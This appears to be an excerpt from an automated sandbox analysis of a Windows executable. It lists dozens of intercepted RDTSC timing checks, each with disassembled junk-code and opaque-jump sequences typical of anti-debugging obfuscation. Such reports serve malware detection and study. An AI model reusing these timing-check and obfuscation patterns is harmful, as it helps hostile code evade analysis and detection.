Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77A0D6 second address: 77A0E6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FF0EC6B64CEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77A0E6 second address: 77A11A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a js 00007FF0EC517C7Ch 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FF0EC517C84h 0x00000019 jnc 00007FF0EC517C76h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77A11A second address: 77A11E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77A11E second address: 77A132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FF0EC517C76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007FF0EC517C76h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77C98D second address: 77C993 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77C993 second address: 77C997 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77CA85 second address: 77CA8B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77CADA second address: 77CAE4 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF0EC517C7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77CAE4 second address: 77CB47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 je 00007FF0EC6B64E0h 0x0000000d push ebx 0x0000000e jmp 00007FF0EC6B64D8h 0x00000013 pop ebx 0x00000014 nop 0x00000015 jmp 00007FF0EC6B64D9h 0x0000001a push 00000000h 0x0000001c push E0E95076h 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 jmp 00007FF0EC6B64D6h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77CB47 second address: 77CB4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77CB4C second address: 77CB51 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77CB51 second address: 77CC12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 1F16B00Ah 0x0000000e mov edx, dword ptr [ebp+122D1C72h] 0x00000014 push 00000003h 0x00000016 mov cx, 90D0h 0x0000001a push 00000000h 0x0000001c mov dword ptr [ebp+122D2BDCh], edx 0x00000022 push 00000003h 0x00000024 call 00007FF0EC517C79h 0x00000029 jmp 00007FF0EC517C7Bh 0x0000002e push eax 0x0000002f push eax 0x00000030 push eax 0x00000031 push eax 0x00000032 pop eax 0x00000033 pop eax 0x00000034 pop eax 0x00000035 mov eax, dword ptr [esp+04h] 0x00000039 push esi 0x0000003a jmp 00007FF0EC517C89h 0x0000003f pop esi 0x00000040 mov eax, dword ptr [eax] 0x00000042 jc 00007FF0EC517C82h 0x00000048 mov dword ptr [esp+04h], eax 0x0000004c jmp 00007FF0EC517C7Eh 0x00000051 pop eax 0x00000052 mov dword ptr [ebp+122D2488h], edx 0x00000058 lea ebx, dword ptr [ebp+12460792h] 0x0000005e pushad 0x0000005f call 00007FF0EC517C7Ch 0x00000064 movsx ecx, bx 0x00000067 pop ebx 0x00000068 popad 0x00000069 xchg eax, ebx 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e jmp 00007FF0EC517C89h 0x00000073 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77CC12 second address: 77CC29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78DDE7 second address: 78DDEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78DDEB second address: 78DE12 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF0EC6B64D1h 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push ecx 0x0000000f jc 00007FF0EC6B64C6h 0x00000015 pop ecx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79D844 second address: 79D84B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79B7BE second address: 79B7C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79B93D second address: 79B943 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79BDB1 second address: 79BDBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79BDBE second address: 79BDE0 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF0EC517C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF0EC517C80h 0x00000011 jp 00007FF0EC517C76h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C215 second address: 79C21B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C21B second address: 79C21F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C21F second address: 79C25E instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF0EC6B64DEh 0x00000008 jmp 00007FF0EC6B64D3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007FF0EC6B64D2h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C25E second address: 79C264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C264 second address: 79C268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C3BE second address: 79C3D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FF0EC517C7Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C523 second address: 79C541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FF0EC6B64CFh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FF0EC6B64C6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C807 second address: 79C81E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0EC517C83h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 792248 second address: 792269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0EC6B64D5h 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007FF0EC6B64C6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79D367 second address: 79D371 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF0EC517C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79D371 second address: 79D377 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79D377 second address: 79D381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FF0EC517C76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A2FE2 second address: 7A3004 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0EC6B64D1h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jnp 00007FF0EC6B64C6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A3004 second address: 7A3014 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF0EC517C7Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A3014 second address: 7A3023 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF0EC6B64CAh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A3023 second address: 7A3029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A5693 second address: 7A5697 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A5697 second address: 7A569D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A569D second address: 7A56A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76D960 second address: 76D97A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0EC517C86h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76D97A second address: 76D996 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7AA133 second address: 7AA137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7AA137 second address: 7AA151 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64CAh 0x00000007 jno 00007FF0EC6B64C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7AA151 second address: 7AA155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7AA155 second address: 7AA159 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7AA159 second address: 7AA169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 jg 00007FF0EC517C76h 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7AA169 second address: 7AA173 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7AA173 second address: 7AA17D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FF0EC517C76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7AA17D second address: 7AA181 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7AA5A7 second address: 7AA5B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jl 00007FF0EC517C82h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7AC74D second address: 7AC753 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7AC753 second address: 7AC757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7AC8BA second address: 7AC8BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7AC9D6 second address: 7AC9DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7ACAB6 second address: 7ACABA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7ADC21 second address: 7ADC25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7ADC25 second address: 7ADC2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7ADC2F second address: 7ADC33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7AED97 second address: 7AED9D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7AE5D4 second address: 7AE5D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7AED9D second address: 7AEE18 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b add edi, 77530AC2h 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007FF0EC6B64C8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D249Bh], ecx 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 call 00007FF0EC6B64C8h 0x0000003d pop eax 0x0000003e mov dword ptr [esp+04h], eax 0x00000042 add dword ptr [esp+04h], 0000001Dh 0x0000004a inc eax 0x0000004b push eax 0x0000004c ret 0x0000004d pop eax 0x0000004e ret 0x0000004f mov esi, dword ptr [ebp+122D3B52h] 0x00000055 xchg eax, ebx 0x00000056 push eax 0x00000057 push edx 0x00000058 push edx 0x00000059 jmp 00007FF0EC6B64CBh 0x0000005e pop edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B0336 second address: 7B034D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FF0EC517C76h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 pop eax 0x00000014 push edx 0x00000015 pop edx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B034D second address: 7B03C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007FF0EC6B64C8h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 push 00000000h 0x00000026 sub esi, dword ptr [ebp+122D3D5Ah] 0x0000002c mov edi, dword ptr [ebp+122D3B82h] 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push ebx 0x00000037 call 00007FF0EC6B64C8h 0x0000003c pop ebx 0x0000003d mov dword ptr [esp+04h], ebx 0x00000041 add dword ptr [esp+04h], 00000019h 0x00000049 inc ebx 0x0000004a push ebx 0x0000004b ret 0x0000004c pop ebx 0x0000004d ret 0x0000004e mov edi, 0ADCB494h 0x00000053 xchg eax, ebx 0x00000054 pushad 0x00000055 jg 00007FF0EC6B64C8h 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B03C9 second address: 7B03CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B03CD second address: 7B03D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B03D1 second address: 7B03F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF0EC517C88h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B0E4E second address: 7B0EAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FF0EC6B64C6h 0x00000009 jg 00007FF0EC6B64C6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 nop 0x00000013 mov esi, dword ptr [ebp+122D378Dh] 0x00000019 push 00000000h 0x0000001b add esi, 4BC81A00h 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push eax 0x00000026 call 00007FF0EC6B64C8h 0x0000002b pop eax 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 add dword ptr [esp+04h], 0000001Ah 0x00000038 inc eax 0x00000039 push eax 0x0000003a ret 0x0000003b pop eax 0x0000003c ret 0x0000003d mov di, D61Fh 0x00000041 mov edi, dword ptr [ebp+122D3BDAh] 0x00000047 xchg eax, ebx 0x00000048 push edx 0x00000049 pushad 0x0000004a jmp 00007FF0EC6B64CBh 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B0EAD second address: 7B0EC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF0EC517C82h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B0BCA second address: 7B0BD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B0EC8 second address: 7B0ECE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B0BD7 second address: 7B0BDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B0ECE second address: 7B0ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B0ED2 second address: 7B0ED6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B5965 second address: 7B597C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C7Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B597C second address: 7B59F7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF0EC6B64C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007FF0EC6B64C8h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007FF0EC6B64C8h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000014h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e ja 00007FF0EC6B64CCh 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ebp 0x00000039 call 00007FF0EC6B64C8h 0x0000003e pop ebp 0x0000003f mov dword ptr [esp+04h], ebp 0x00000043 add dword ptr [esp+04h], 0000001Dh 0x0000004b inc ebp 0x0000004c push ebp 0x0000004d ret 0x0000004e pop ebp 0x0000004f ret 0x00000050 push 00000000h 0x00000052 mov ebx, dword ptr [ebp+122D1FFBh] 0x00000058 mov ebx, edi 0x0000005a push eax 0x0000005b pushad 0x0000005c jno 00007FF0EC6B64C8h 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B59F7 second address: 7B59FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B20E5 second address: 7B20E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B20E9 second address: 7B20ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B20ED second address: 7B2115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 js 00007FF0EC6B64E6h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF0EC6B64D8h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B6A1C second address: 7B6A22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B6A22 second address: 7B6A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B8866 second address: 7B88E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007FF0EC517C83h 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e popad 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007FF0EC517C78h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a cld 0x0000002b push 00000000h 0x0000002d and edi, dword ptr [ebp+122D1F5Ch] 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edx 0x00000038 call 00007FF0EC517C78h 0x0000003d pop edx 0x0000003e mov dword ptr [esp+04h], edx 0x00000042 add dword ptr [esp+04h], 00000018h 0x0000004a inc edx 0x0000004b push edx 0x0000004c ret 0x0000004d pop edx 0x0000004e ret 0x0000004f stc 0x00000050 movzx ebx, bx 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 jnp 00007FF0EC517C7Ch 0x0000005c jnp 00007FF0EC517C76h 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B7BB6 second address: 7B7BBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B9832 second address: 7B9837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
